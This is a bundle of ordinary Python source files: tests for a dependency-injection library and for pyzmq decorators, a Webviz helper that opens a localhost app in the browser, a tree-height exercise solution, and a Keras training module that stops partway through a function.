    with pytest.raises(UnknownArgument):
        class A:
            @inject
            @noninjectable('c')  # 'c' is not a parameter of __init__
            def __init__(self, b: str):
                self.b = b


def test_can_create_instance_with_untyped_noninjectable_argument():
    class Parent:
        @inject
        @noninjectable('child1', 'child2')
        def __init__(self, child1, *, child2):
            self.child1 = child1
            self.child2 = child2

    builder = Injector().get(AssistedBuilder[Parent])
    parent = builder.build(child1='injected1', child2='injected2')
    assert (parent.child1, parent.child2) == ('injected1', 'injected2')


def test_implicit_injection_fails_when_annotations_are_missing():
    class A:
        def __init__(self, n):
            self.n = n

    with pytest.raises(CallError):
        Injector().get(A)
def test_injection_works_in_presence_of_return_value_annotation():
    # PEP 484-compatible code annotates __init__ as returning None and this
    # used to confuse Injector:
    #   injector.UnknownProvider: couldn't determine provider for None to None
    # https://www.python.org/dev/peps/pep-0484/#the-meaning-of-annotations
    class A:
        @inject
        def __init__(self, s: str) -> None:
            self.s = s

    def configure(binder):
        binder.bind(str, to='this is string')

    instance = Injector([configure]).get(A)
    # Sanity check that injection actually happened.
    assert instance.s == 'this is string'


def test_things_dont_break_in_presence_of_args_or_kwargs():
    class A:
        @inject
        def __init__(self, s: str, *args: int, **kwargs: str):
            assert not args
            assert not kwargs

    # Regression: annotated *args/**kwargs used to be treated as regular
    # dependencies and were injected as {'args': 0, 'kwargs': ''}.
    Injector().get(A)
def test_forward_references_in_annotations_are_handled():
    # See https://www.python.org/dev/peps/pep-0484/#forward-references for details
    class CustomModule(Module):
        @provider
        def provide_x(self) -> 'X':
            return X('hello')

    @inject
    def fun(s: 'X') -> 'X':
        return s

    # The class needs to be module-global in order for the string -> object
    # resolution mechanism to work. I could make it work with locals but it
    # doesn't seem worth it.
    global X

    class X:
        def __init__(self, message: str) -> None:
            self.message = message

    try:
        injector = Injector(CustomModule)
        assert injector.call_with_injection(fun).message == 'hello'
    finally:
        # Clean up the module namespace even if the assertion fails.
        del X
def test_more_useful_exception_is_raised_when_parameters_type_is_any():
    @inject
    def fun(a: Any) -> None:
        pass

    # Historically this raised a bare
    #   TypeError: Cannot instantiate <class 'typing.AnyMeta'>
    # while now a CallError carrying the injection stack is raised:
    #   injector.CallError: Call to AnyMeta.__new__() failed: Cannot
    #   instantiate <class 'typing.AnyMeta'> (injection stack: [...])
    # The stack is what makes deep injection failures debuggable.
    with pytest.raises((CallError, TypeError)):
        Injector().call_with_injection(fun)


def test_optionals_are_ignored_for_now():
    @inject
    def fun(s: str = None):
        return s

    assert Injector().call_with_injection(fun) == ''
def test_explicitly_passed_parameters_override_injectable_values():
    # The class needs to be defined globally for the 'X' forward reference to be able to be resolved.
    global X

    # We test a method on top of regular function to exercise the code path that's
    # responsible for handling methods.
    class X:
        @inject
        def method(self, s: str) -> str:
            return s

        @inject
        def method_typed_self(self: 'X', s: str) -> str:
            return s

    @inject
    def function(s: str) -> str:
        return s

    # Counts how many times the bound provider actually ran; explicitly
    # passed arguments must not trigger injection.
    injection_counter = 0

    def provide_str() -> str:
        nonlocal injection_counter
        injection_counter += 1
        return 'injected string'

    def configure(binder: Binder) -> None:
        binder.bind(str, to=provide_str)

    injector = Injector([configure])
    x = X()

    try:
        # With no explicit arguments every call goes through injection...
        assert injection_counter == 0
        assert injector.call_with_injection(x.method) == 'injected string'
        assert injection_counter == 1
        assert injector.call_with_injection(x.method_typed_self) == 'injected string'
        assert injection_counter == 2
        assert injector.call_with_injection(function) == 'injected string'
        assert injection_counter == 3
        # ...while explicit positional or keyword arguments bypass it
        # (the counter stays at 3 from here on).
        assert injector.call_with_injection(x.method, args=('passed string',)) == 'passed string'
        assert injection_counter == 3
        assert injector.call_with_injection(x.method_typed_self, args=('passed string',)) == 'passed string'
        assert injection_counter == 3
        assert injector.call_with_injection(function, args=('passed string',)) == 'passed string'
        assert injection_counter == 3
        assert injector.call_with_injection(x.method, kwargs={'s': 'passed string'}) == 'passed string'
        assert injection_counter == 3
        assert (
            injector.call_with_injection(x.method_typed_self, kwargs={'s': 'passed string'})
            == 'passed string'
        )
        assert injection_counter == 3
        assert injector.call_with_injection(function, kwargs={'s': 'passed string'}) == 'passed string'
        assert injection_counter == 3
    finally:
        del X
def test_class_assisted_builder_of_partially_injected_class():
    class A:
        pass

    class B:
        @inject
        def __init__(self, a: A, b: str):
            self.a = a
            self.b = b

    class C:
        @inject
        def __init__(self, a: A, builder: ClassAssistedBuilder[B]):
            self.a = a
            self.b = builder.build(b='C')

    instance = Injector().get(C)
    assert isinstance(instance, C)
    assert isinstance(instance.b, B)
    assert isinstance(instance.b.a, A)


# The test taken from Alec Thomas' pull request: https://github.com/alecthomas/injector/pull/73
def test_child_scope():
    TestKey = NewType('TestKey', str)
    TestKey2 = NewType('TestKey2', str)

    def parent_module(binder):
        binder.bind(TestKey, to='in parent', scope=singleton)

    def first_child_module(binder):
        binder.bind(TestKey2, to='in first child', scope=singleton)

    def second_child_module(binder):
        binder.bind(TestKey2, to='in second child', scope=singleton)

    parent = Injector(modules=[parent_module])
    first_child = parent.create_child_injector(modules=[first_child_module])
    second_child = parent.create_child_injector(modules=[second_child_module])
    # A parent singleton is shared by all children...
    assert first_child.get(TestKey) is first_child.get(TestKey)
    assert first_child.get(TestKey) is second_child.get(TestKey)
    # ...but each child keeps its own singleton for its own bindings.
    assert first_child.get(TestKey2) is not second_child.get(TestKey2)
def test_custom_scopes_work_as_expected_with_child_injectors():
    """A binding in a custom singleton scope may be overridden in a child
    injector without affecting the value cached by the parent."""
    class CustomSingletonScope(SingletonScope):
        pass

    custom_singleton = ScopeDecorator(CustomSingletonScope)

    def parent_module(binder):
        binder.bind(str, to='parent value', scope=custom_singleton)

    def child_module(binder):
        binder.bind(str, to='child value', scope=custom_singleton)

    parent = Injector(modules=[parent_module])
    child = parent.create_child_injector(modules=[child_module])
    # A leftover debug print of (parent, child) was removed here; tests
    # should not write to stdout on the success path.
    assert parent.get(str) == 'parent value'
    assert child.get(str) == 'child value'
# Test for https://github.com/alecthomas/injector/issues/75
def test_inject_decorator_does_not_break_manual_construction_of_pyqt_objects():
    class PyQtFake:
        @inject
        def __init__(self):
            pass

        def __getattribute__(self, item):
            if item == '__injector__':
                raise RuntimeError(
                    'A PyQt class would raise this exception if getting '
                    'self.__injector__ before __init__ is called and '
                    'self.__injector__ has not been set by Injector.'
                )
            return object.__getattribute__(self, item)

    instance = PyQtFake()  # This used to raise the exception
    assert isinstance(instance, PyQtFake)


def test_using_an_assisted_builder_with_a_provider_raises_an_injector_error():
    class A:
        pass

    class MyModule(Module):
        @provider
        def provide_a(self, builder: AssistedBuilder[A]) -> A:
            return builder.build()

    with pytest.raises(Error):
        Injector(MyModule).get(A)
def test_newtype_integration_works():
    UserID = NewType('UserID', int)

    def configure(binder):
        binder.bind(UserID, to=123)

    assert Injector([configure]).get(UserID) == 123
@pytest.mark.skipif(sys.version_info < (3, 6), reason="Requires Python 3.6+")
def test_dataclass_integration_works():
    import dataclasses

    # Python 3.6+-only syntax below; exec() keeps the module importable on
    # older interpreters.  NOTE(review): locals() is passed as exec's
    # globals argument (so @inject and dataclasses resolve inside the
    # string) and globals() as its locals, which makes ``Data`` land in
    # the module namespace — confirm this inversion is intentional.
    exec(
        """
@inject
@dataclasses.dataclass
class Data:
    name: str
""",
        locals(),
        globals(),
    )

    def configure(binder):
        binder.bind(str, to='data')

    injector = Injector([configure])
    assert injector.get(Data).name == 'data'
def test_get_bindings():
    # No @inject and no Inject[...] markers -> nothing is injectable.
    def function1(a: int) -> None:
        pass

    assert get_bindings(function1) == {}

    @inject
    def function2(a: int) -> None:
        pass

    assert get_bindings(function2) == {'a': int}

    # @noninjectable removes a parameter from the binding set.
    @inject
    @noninjectable('b')
    def function3(a: int, b: str) -> None:
        pass

    assert get_bindings(function3) == {'a': int}

    if HAVE_ANNOTATED:
        # The simple case of no @inject but injection requested with Inject[...]
        def function4(a: Inject[int], b: str) -> None:
            pass

        assert get_bindings(function4) == {'a': int}

        # Using @inject with Inject is redundant but it should not break anything
        @inject
        def function5(a: Inject[int], b: str) -> None:
            pass

        assert get_bindings(function5) == {'a': int, 'b': str}

        # We need to be able to exclude a parameter from injection with NoInject
        @inject
        def function6(a: int, b: NoInject[str]) -> None:
            pass

        assert get_bindings(function6) == {'a': int}

        # The presence of NoInject should not trigger anything on its own
        def function7(a: int, b: NoInject[str]) -> None:
            pass

        assert get_bindings(function7) == {}
|
_localhost_open_browser.py | import os
import time
import urllib
import warnings
import threading
import webbrowser
from .._is_reload_process import is_reload_process
from .._user_preferences import get_user_preference
from . import terminal_colors
class LocalhostOpenBrowser:
    """Polls the locally running application and opens it in a browser tab
    (with a one-time login token) once it responds."""

    # pylint: disable=too-few-public-methods

    def __init__(self, port: int, token: str):
        self._port = port
        self._token = token

        if not is_reload_process():
            # Only open new browser tab if not a reload process
            threading.Thread(target=self._timer).start()

    def _timer(self) -> None:
        """Waits until the app is ready, and then opens the page
        in the default browser.
        """
        timeout = 120  # maximum number of seconds to wait before timeout

        for _ in range(timeout):
            if self._app_ready():
                self._open_new_tab()
                return
            time.sleep(1)

        print(
            f"WARNING: Webviz application still not ready after {timeout}s.\n"
            "Will not open browser automatically. Your private one-time login link:\n"
            f"{self._url(with_token=True)}"
        )

    def _url(self, with_token: bool = False, https: bool = True) -> str:
        """Build the localhost URL, optionally appending the one-time
        token as the ``ott`` query parameter."""
        return (
            f"{'https' if https else 'http'}://localhost:{self._port}"
            + f"{'?ott=' + self._token if with_token else ''}"
        )

    @staticmethod
    def _get_browser_controller() -> webbrowser.BaseBrowser:
        """Return the user-preferred browser, then a Chrome variant,
        falling back to the system default."""
        if get_user_preference("browser") is not None:
            try:
                return webbrowser.get(using=get_user_preference("browser"))
            except webbrowser.Error:
                warnings.warn("Could not find the user preferred browser.")

        for browser in ["chrome", "chromium-browser"]:
            try:
                return webbrowser.get(using=browser)
            except webbrowser.Error:
                pass

        # Return default browser if none of the
        # preferred browsers are installed:
        return webbrowser.get()

    def _app_ready(self) -> bool:
        """Check if the flask instance is ready."""
        no_proxy_env = os.environ.get("NO_PROXY")
        os.environ["NO_PROXY"] = "localhost"

        try:
            urllib.request.urlopen(self._url(https=False))  # nosec
            app_ready = True
        except urllib.error.URLError:  # type: ignore[attr-defined]
            # The flask instance has not started
            app_ready = False
        except ConnectionResetError:
            # The flask instance has started but (correctly) abort
            # request due to "401 Unauthorized"
            app_ready = True
        finally:
            # BUG FIX: previously NO_PROXY was overwritten with "" even when
            # it had not been set at all; restore the environment exactly.
            if no_proxy_env is None:
                os.environ.pop("NO_PROXY", None)
            else:
                os.environ["NO_PROXY"] = no_proxy_env

        return app_ready

    def _open_new_tab(self) -> None:
        """Open the url (with token) in the default browser."""
        print(
            f"{terminal_colors.GREEN}{terminal_colors.BOLD}"
            f" Opening the application ({self._url()}) in your browser.\n"
            " Press CTRL + C in this terminal window to stop the application."
            f"{terminal_colors.END}"
        )
        LocalhostOpenBrowser._get_browser_controller().open_new_tab(
            self._url(with_token=True)
        )
|
Tree Height.py |
import sys, threading
sys.setrecursionlimit(10**7) # max depth of recursion
threading.stack_size(2**27) # new thread will get stack of such size
class TreeHeight:
    """Computes the height of a tree given in parent-array form."""

    def read(self):
        # First stdin line: node count; second line: parent index per node,
        # with -1 marking the root.
        self.n = int(sys.stdin.readline())
        self.parent = list(map(int, sys.stdin.readline().split()))

    def compute_height(self):
        """Return the tree height, memoizing per-node heights so every
        node is processed only a constant number of times."""
        max_height = 0
        heights = [0] * len(self.parent)
        for vertex in range(self.n):
            if heights[vertex] != 0:
                continue  # height already known for this node
            depth = 0
            node = vertex
            # Walk up towards the root, stopping early at any node whose
            # height was computed on a previous pass.
            while node != -1:
                if heights[node] != 0:
                    depth += heights[node]
                    break
                depth += 1
                node = self.parent[node]
            max_height = max(max_height, depth)
            # Second walk: record the height of every node on the path.
            node = vertex
            while node != -1:
                if heights[node] != 0:
                    break
                heights[node] = depth
                depth -= 1
                node = self.parent[node]
        return max_height
def main():
    # Read the tree from stdin and print its height.
    tree = TreeHeight()
    tree.read()
    print(tree.compute_height())


# Run in a dedicated thread so the enlarged stack size configured above
# applies to the computation.
threading.Thread(target=main).start()
# Coded by TSG405, 2021
|
test_decorators.py | import threading
from pytest import fixture, raises
import zmq
from zmq.decorators import context, socket
from zmq.tests import BaseZMQTestCase, term_context
##############################################
# Test cases for @context
##############################################
@fixture(autouse=True)
def term_context_instance(request):
    # Terminate the global Context.instance() after every test.
    def _terminate():
        term_context(zmq.Context.instance(), timeout=10)

    request.addfinalizer(_terminate)
def test_ctx():
    @context()
    def test(ctx):
        assert isinstance(ctx, zmq.Context), ctx

    test()


def test_ctx_orig_args():
    # Decorator-injected ``ctx`` coexists with the function's own arguments.
    @context()
    def f(foo, bar, ctx, baz=None):
        assert isinstance(ctx, zmq.Context), ctx
        assert foo == 42
        assert bar is True
        assert baz == 'mock'

    f(42, True, baz='mock')


def test_ctx_arg_naming():
    # A positional name selects which parameter receives the Context.
    @context('myctx')
    def test(myctx):
        assert isinstance(myctx, zmq.Context), myctx

    test()


def test_ctx_args():
    # Extra positional arguments are forwarded to the Context constructor.
    @context('ctx', 5)
    def test(ctx):
        assert isinstance(ctx, zmq.Context), ctx
        assert ctx.IO_THREADS == 5, ctx.IO_THREADS

    test()


def test_ctx_arg_kwarg():
    @context('ctx', io_threads=5)
    def test(ctx):
        assert isinstance(ctx, zmq.Context), ctx
        assert ctx.IO_THREADS == 5, ctx.IO_THREADS

    test()


def test_ctx_kw_naming():
    @context(name='myctx')
    def test(myctx):
        assert isinstance(myctx, zmq.Context), myctx

    test()


def test_ctx_kwargs():
    @context(name='ctx', io_threads=5)
    def test(ctx):
        assert isinstance(ctx, zmq.Context), ctx
        assert ctx.IO_THREADS == 5, ctx.IO_THREADS

    test()


def test_ctx_kwargs_default():
    # The injected value overrides the parameter's default.
    @context(name='ctx', io_threads=5)
    def test(ctx=None):
        assert isinstance(ctx, zmq.Context), ctx
        assert ctx.IO_THREADS == 5, ctx.IO_THREADS

    test()


def test_ctx_keyword_miss():
    # Naming a parameter the function does not have raises TypeError.
    @context(name='ctx')
    def test(other_name):
        pass  # the keyword ``ctx`` not found

    with raises(TypeError):
        test()


def test_ctx_multi_assign():
    # Explicitly passing a value for the injected parameter raises TypeError.
    @context(name='ctx')
    def test(ctx):
        pass  # explosion

    with raises(TypeError):
        test('mock')


def test_ctx_reinit():
    # Each call gets its own fresh Context instance.
    result = {'foo': None, 'bar': None}

    @context()
    def f(key, ctx):
        assert isinstance(ctx, zmq.Context), ctx
        result[key] = ctx

    foo_t = threading.Thread(target=f, args=('foo',))
    bar_t = threading.Thread(target=f, args=('bar',))
    foo_t.start()
    bar_t.start()
    foo_t.join()
    bar_t.join()
    assert result['foo'] is not None, result
    assert result['bar'] is not None, result
    assert result['foo'] is not result['bar'], result


def test_ctx_multi_thread():
    # Stacked @context decorators inject two distinct Contexts and the
    # decorated function can safely run from many threads at once.
    @context()
    @context()
    def f(foo, bar):
        assert isinstance(foo, zmq.Context), foo
        assert isinstance(bar, zmq.Context), bar
        assert len(set(map(id, [foo, bar]))) == 2, set(map(id, [foo, bar]))

    threads = [threading.Thread(target=f) for i in range(8)]
    [t.start() for t in threads]
    [t.join() for t in threads]
##############################################
# Test cases for @socket
##############################################
def test_ctx_skt():
    # @socket nested under @context creates the socket in that context.
    @context()
    @socket(zmq.PUB)
    def test(ctx, skt):
        assert isinstance(ctx, zmq.Context), ctx
        assert isinstance(skt, zmq.Socket), skt
        assert skt.type == zmq.PUB

    test()


def test_skt_name():
    @context()
    @socket('myskt', zmq.PUB)
    def test(ctx, myskt):
        assert isinstance(myskt, zmq.Socket), myskt
        assert isinstance(ctx, zmq.Context), ctx
        assert myskt.type == zmq.PUB

    test()


def test_skt_kwarg():
    @context()
    @socket(zmq.PUB, name='myskt')
    def test(ctx, myskt):
        assert isinstance(myskt, zmq.Socket), myskt
        assert isinstance(ctx, zmq.Context), ctx
        assert myskt.type == zmq.PUB

    test()


def test_ctx_skt_name():
    # context_name ties the socket to an explicitly named context argument.
    @context('ctx')
    @socket('skt', zmq.PUB, context_name='ctx')
    def test(ctx, skt):
        assert isinstance(skt, zmq.Socket), skt
        assert isinstance(ctx, zmq.Context), ctx
        assert skt.type == zmq.PUB

    test()


def test_skt_default_ctx():
    # Without @context the socket comes from the global Context.instance().
    @socket(zmq.PUB)
    def test(skt):
        assert isinstance(skt, zmq.Socket), skt
        assert skt.context is zmq.Context.instance()
        assert skt.type == zmq.PUB

    test()


def test_skt_reinit():
    # Each call creates a fresh Socket.
    result = {'foo': None, 'bar': None}

    @socket(zmq.PUB)
    def f(key, skt):
        assert isinstance(skt, zmq.Socket), skt
        result[key] = skt

    foo_t = threading.Thread(target=f, args=('foo',))
    bar_t = threading.Thread(target=f, args=('bar',))
    foo_t.start()
    bar_t.start()
    foo_t.join()
    bar_t.join()
    assert result['foo'] is not None, result
    assert result['bar'] is not None, result
    assert result['foo'] is not result['bar'], result


def test_ctx_skt_reinit():
    # Context and socket are both created per call, also across threads.
    result = {'foo': {'ctx': None, 'skt': None}, 'bar': {'ctx': None, 'skt': None}}

    @context()
    @socket(zmq.PUB)
    def f(key, ctx, skt):
        assert isinstance(ctx, zmq.Context), ctx
        assert isinstance(skt, zmq.Socket), skt
        result[key]['ctx'] = ctx
        result[key]['skt'] = skt

    foo_t = threading.Thread(target=f, args=('foo',))
    bar_t = threading.Thread(target=f, args=('bar',))
    foo_t.start()
    bar_t.start()
    foo_t.join()
    bar_t.join()
    assert result['foo']['ctx'] is not None, result
    assert result['foo']['skt'] is not None, result
    assert result['bar']['ctx'] is not None, result
    assert result['bar']['skt'] is not None, result
    assert result['foo']['ctx'] is not result['bar']['ctx'], result
    assert result['foo']['skt'] is not result['bar']['skt'], result


def test_skt_type_miss():
    # Omitting the socket type raises TypeError at call time.
    @context()
    @socket('myskt')
    def f(ctx, myskt):
        pass  # the socket type is missing

    with raises(TypeError):
        f()


def test_multi_skts():
    # Multiple @socket decorators inject one socket per parameter.
    @socket(zmq.PUB)
    @socket(zmq.SUB)
    @socket(zmq.PUSH)
    def test(pub, sub, push):
        assert isinstance(pub, zmq.Socket), pub
        assert isinstance(sub, zmq.Socket), sub
        assert isinstance(push, zmq.Socket), push
        assert pub.context is zmq.Context.instance()
        assert sub.context is zmq.Context.instance()
        assert push.context is zmq.Context.instance()
        assert pub.type == zmq.PUB
        assert sub.type == zmq.SUB
        assert push.type == zmq.PUSH

    test()


def test_multi_skts_single_ctx():
    # All sockets share the single decorator-provided context.
    @context()
    @socket(zmq.PUB)
    @socket(zmq.SUB)
    @socket(zmq.PUSH)
    def test(ctx, pub, sub, push):
        assert isinstance(ctx, zmq.Context), ctx
        assert isinstance(pub, zmq.Socket), pub
        assert isinstance(sub, zmq.Socket), sub
        assert isinstance(push, zmq.Socket), push
        assert pub.context is ctx
        assert sub.context is ctx
        assert push.context is ctx
        assert pub.type == zmq.PUB
        assert sub.type == zmq.SUB
        assert push.type == zmq.PUSH

    test()


def test_multi_skts_with_name():
    @socket('foo', zmq.PUSH)
    @socket('bar', zmq.SUB)
    @socket('baz', zmq.PUB)
    def test(foo, bar, baz):
        assert isinstance(foo, zmq.Socket), foo
        assert isinstance(bar, zmq.Socket), bar
        assert isinstance(baz, zmq.Socket), baz
        assert foo.context is zmq.Context.instance()
        assert bar.context is zmq.Context.instance()
        assert baz.context is zmq.Context.instance()
        assert foo.type == zmq.PUSH
        assert bar.type == zmq.SUB
        assert baz.type == zmq.PUB

    test()


def test_func_return():
    # The decorator passes the wrapped function's return value through.
    @context()
    def f(ctx):
        assert isinstance(ctx, zmq.Context), ctx
        return 'something'

    assert f() == 'something'


def test_skt_multi_thread():
    @socket(zmq.PUB)
    @socket(zmq.SUB)
    @socket(zmq.PUSH)
    def f(pub, sub, push):
        assert isinstance(pub, zmq.Socket), pub
        assert isinstance(sub, zmq.Socket), sub
        assert isinstance(push, zmq.Socket), push
        assert pub.context is zmq.Context.instance()
        assert sub.context is zmq.Context.instance()
        assert push.context is zmq.Context.instance()
        assert pub.type == zmq.PUB
        assert sub.type == zmq.SUB
        assert push.type == zmq.PUSH
        assert len(set(map(id, [pub, sub, push]))) == 3

    threads = [threading.Thread(target=f) for i in range(8)]
    [t.start() for t in threads]
    [t.join() for t in threads]
class TestMethodDecorators(BaseZMQTestCase):
    """@context/@socket also work on methods: the injected arguments are
    filled in after ``self``."""

    @context()
    @socket(zmq.PUB)
    @socket(zmq.SUB)
    def multi_skts_method(self, ctx, pub, sub, foo='bar'):
        assert isinstance(self, TestMethodDecorators), self
        assert isinstance(ctx, zmq.Context), ctx
        assert isinstance(pub, zmq.Socket), pub
        assert isinstance(sub, zmq.Socket), sub
        assert foo == 'bar'
        assert pub.context is ctx
        assert sub.context is ctx
        assert pub.type == zmq.PUB
        assert sub.type == zmq.SUB

    def test_multi_skts_method(self):
        self.multi_skts_method()

    def test_multi_skts_method_other_args(self):
        # Ordinary positional and keyword arguments are still accepted
        # alongside the injected sockets.
        @socket(zmq.PUB)
        @socket(zmq.SUB)
        def f(foo, pub, sub, bar=None):
            assert isinstance(pub, zmq.Socket), pub
            assert isinstance(sub, zmq.Socket), sub
            assert foo == 'mock'
            assert bar == 'fake'
            assert pub.context is zmq.Context.instance()
            assert sub.context is zmq.Context.instance()
            assert pub.type == zmq.PUB
            assert sub.type == zmq.SUB

        f('mock', bar='fake')
|
training.py | from __future__ import print_function
from __future__ import absolute_import
import warnings
import copy
import time
import numpy as np
import multiprocessing
import threading
try:
import queue
except ImportError:
import Queue as queue
from .topology import Container
from .. import backend as K
from .. import optimizers
from .. import objectives
from .. import metrics as metrics_module
from ..utils.generic_utils import Progbar
from .. import callbacks as cbks
def standardize_input_data(data, names, shapes=None,
                           check_batch_dim=True,
                           exception_prefix=''):
    '''Normalize user-provided input data to an ordered list of arrays.

    Users may pass data as a list of arrays, dictionary of arrays,
    or as a single array. We normalize this to an ordered list of
    arrays (same order as `names`), while checking that the provided
    arrays have shapes that match the network's expectations.

    # Arguments
        data: Numpy array, list of Numpy arrays, or dict mapping
            names to Numpy arrays.
        names: list of expected array names; defines the output order.
        shapes: optional list of expected shapes, one per name
            (entries may be None to skip checking that array).
        check_batch_dim: whether the first (batch) axis should also
            be validated against `shapes`.
        exception_prefix: string prepended to error messages for
            context (e.g. 'model input').

    # Returns
        List of Numpy arrays (each made at least 2D), ordered like `names`.

    # Raises
        Exception: if data is missing a key, has the wrong count,
            or has a shape incompatible with `shapes`.
    '''
    if isinstance(data, dict):
        # reorder the dict's values to follow `names`
        arrays = []
        for name in names:
            if name not in data:
                raise Exception('No data provided for "' +
                                name + '". Need data for each key in: ' +
                                str(data.keys()))
            arrays.append(data[name])
    elif isinstance(data, list):
        if len(data) != len(names):
            if len(data) > 0 and hasattr(data[0], 'shape'):
                raise Exception('Error when checking ' + exception_prefix +
                                ': the list of Numpy arrays '
                                'that you are passing to your model '
                                'is not the size the model expected. '
                                'Expected to see ' + str(len(names)) +
                                ' arrays but instead got '
                                'the following list of ' + str(len(data)) +
                                ' arrays: ' + str(data)[:200] +
                                '...')
            elif len(names) == 1:
                # a flat list of values for a single input: wrap it
                data = [np.asarray(data)]
            else:
                raise Exception('Error when checking ' + exception_prefix +
                                ': you are passing a list as '
                                'input to your model, '
                                'but the model expects '
                                'a list of ' + str(len(names)) +
                                ' Numpy arrays instead. '
                                'The list you passed was: ' +
                                str(data)[:200])
        arrays = data
    else:
        if not hasattr(data, 'shape'):
            raise Exception('Error when checking ' + exception_prefix +
                            ': data should be a Numpy array, '
                            'or list/dict of Numpy arrays. '
                            'Found: ' + str(data)[:200] + '...')
        if len(names) != 1:
            # case: model expects multiple inputs but only received
            # a single Numpy array
            raise Exception('The model expects ' + str(len(names)) +
                            ' input arrays, but only received one array. '
                            'Found: array with shape ' + str(data.shape))
        arrays = [data]
    # make arrays at least 2D
    for i in range(len(names)):
        array = arrays[i]
        if len(array.shape) == 1:
            arrays[i] = np.expand_dims(array, 1)
    # check shapes compatibility
    if shapes:
        for i in range(len(names)):
            if shapes[i] is None:
                continue
            array = arrays[i]
            if len(array.shape) != len(shapes[i]):
                raise Exception('Error when checking ' + exception_prefix +
                                ': expected ' + names[i] +
                                ' to have ' + str(len(shapes[i])) +
                                ' dimensions, but got array with shape ' +
                                str(array.shape))
            for j, (dim, ref_dim) in enumerate(zip(array.shape, shapes[i])):
                if not j and not check_batch_dim:
                    # skip the first (batch) axis
                    continue
                if ref_dim and ref_dim != dim:
                    raise Exception('Error when checking ' + exception_prefix +
                                    ': expected ' + names[i] +
                                    ' to have shape ' + str(shapes[i]) +
                                    ' but got array with shape ' +
                                    str(array.shape))
    return arrays
def standardize_sample_or_class_weights(x_weight, output_names, weight_type):
    '''Normalize sample/class weights to one entry per model output.

    # Arguments
        x_weight: user-provided weights: None, a single value,
            a list (one entry per output), or a dict keyed by output name.
        output_names: list of model output names.
        weight_type: 'sample_weight' or 'class_weight' (used in messages).

    # Returns
        List with one weight entry (possibly None) per output name.

    # Raises
        Exception: if a list has the wrong length, or the type cannot
            be interpreted for a multi-output model.
    '''
    # NOTE(review): scalar weights (objects without __len__) raise
    # TypeError on the len() below — confirm callers never pass scalars.
    if x_weight is None or len(x_weight) == 0:
        return [None for _ in output_names]
    if len(output_names) == 1:
        if isinstance(x_weight, list) and len(x_weight) == 1:
            return x_weight
        if isinstance(x_weight, dict) and output_names[0] in x_weight:
            return [x_weight[output_names[0]]]
        else:
            return [x_weight]
    if isinstance(x_weight, list):
        if len(x_weight) != len(output_names):
            raise Exception('Provided `' + weight_type + '` was a list of ' +
                            str(len(x_weight)) +
                            ' elements, but the model has ' +
                            str(len(output_names)) + ' outputs. '
                            'You should provide one `' + weight_type + '`'
                            'array per model output.')
        return x_weight
    if isinstance(x_weight, dict):
        x_weights = []
        for name in output_names:
            x_weights.append(x_weight.get(name))
        return x_weights
    else:
        # fixed message typo: "a list of a dict" -> "a list or a dict"
        raise Exception('The model has multiple outputs, so `' +
                        weight_type + '` '
                        'should be either a list or a dict. '
                        'Provided `' + weight_type +
                        '` type not understood: ' +
                        str(x_weight))
def standardize_class_weights(class_weight, output_names):
    """Normalize `class_weight` to one entry per model output."""
    return standardize_sample_or_class_weights(
        class_weight, output_names, 'class_weight')
def standardize_sample_weights(sample_weight, output_names):
    """Normalize `sample_weight` to one entry per model output."""
    return standardize_sample_or_class_weights(
        sample_weight, output_names, 'sample_weight')
def check_array_lengths(X, Y, W):
    '''Check that inputs, targets and weights share one sample count.

    # Arguments
        X: list of input Numpy arrays.
        Y: list of target Numpy arrays.
        W: list of sample-weight Numpy arrays.

    # Raises
        Exception: on any sample-count mismatch.
    '''
    x_lengths = [x.shape[0] for x in X]
    y_lengths = [y.shape[0] for y in Y]
    w_lengths = [w.shape[0] for w in W]
    set_x = set(x_lengths)
    if len(set_x) != 1:
        raise Exception('All input arrays (x) should have '
                        'the same number of samples.')
    set_y = set(y_lengths)
    if len(set_y) != 1:
        raise Exception('All target arrays (y) should have '
                        'the same number of samples.')
    set_w = set(w_lengths)
    if len(set_w) != 1:
        raise Exception('All sample_weight arrays should have '
                        'the same number of samples.')
    nb_x = set_x.pop()
    nb_y = set_y.pop()
    nb_w = set_w.pop()
    if nb_x != nb_y:
        raise Exception('Input arrays should have '
                        'the same number of samples as target arrays. Found ' +
                        str(nb_x) + ' input samples and ' +
                        str(nb_y) + ' target samples.')
    if nb_x != nb_w:
        # message fix: this count is the weight length, it was
        # mislabeled as "target samples"
        raise Exception('Sample_weight arrays should have '
                        'the same number of samples as input arrays. Found ' +
                        str(nb_x) + ' input samples and ' +
                        str(nb_w) + ' weight samples.')
def check_loss_and_target_compatibility(targets, losses, output_shapes):
    '''Validate that each target array is compatible with its loss
    function and the corresponding model output shape.

    # Arguments
        targets: list of target (label) Numpy arrays.
        losses: list of objective functions, one per output.
        output_shapes: list of model output shapes.

    # Raises
        Exception: when categorical_crossentropy gets single-column
            targets, or a key loss sees a last-dim mismatch.
    '''
    assert len(targets) == len(losses) == len(output_shapes)
    # Bug fix: the Keras objective is named `mean_squared_error`;
    # the old entry 'mean_square_error' never matched, so MSE outputs
    # silently skipped the shape check below.
    key_losses = {'mean_squared_error',
                  'binary_crossentropy',
                  'categorical_crossentropy'}
    for y, loss, shape in zip(targets, losses, output_shapes):
        if loss.__name__ == 'categorical_crossentropy':
            if y.shape[1] == 1:
                raise Exception('You are passing a target array of shape ' + str(y.shape) +
                                ' while using as loss `categorical_crossentropy`. '
                                '`categorical_crossentropy` expects '
                                'targets to be binary matrices (1s and 0s) '
                                'of shape (samples, classes). '
                                'If your targets are integer classes, '
                                'you can convert them to the expected format via:\n'
                                '```\n'
                                'from keras.utils.np_utils import to_categorical\n'
                                'y_binary = to_categorical(y_int)\n'
                                '```\n'
                                '\n'
                                'Alternatively, you can use the loss function '
                                '`sparse_categorical_crossentropy` instead, '
                                'which does expect integer targets.')
        if loss.__name__ in key_losses and shape[1] is not None and y.shape[1] != shape[1]:
            raise Exception('A target array with shape ' + str(y.shape) +
                            ' was passed for an output of shape ' + str(shape) +
                            ' while using as loss `' + loss.__name__ + '`. '
                            'This loss expects '
                            'targets to have the same shape '
                            'as the output.')
def collect_metrics(metrics, output_names):
    '''Map user-provided metrics to a nested list, one sublist per output.

    # Arguments
        metrics: None/empty, a list (applied to every output), or a dict
            mapping output names to a metric or list of metrics.
        output_names: list of model output names.

    # Returns
        List of metric lists, aligned with `output_names`.

    # Raises
        Exception: if `metrics` is neither a list nor a dict.
    '''
    if not metrics:
        return [[] for _ in output_names]
    if isinstance(metrics, list):
        # a flat list applies every metric to every output;
        # copy so outputs do not share one mutable list
        return [copy.copy(metrics) for _ in output_names]
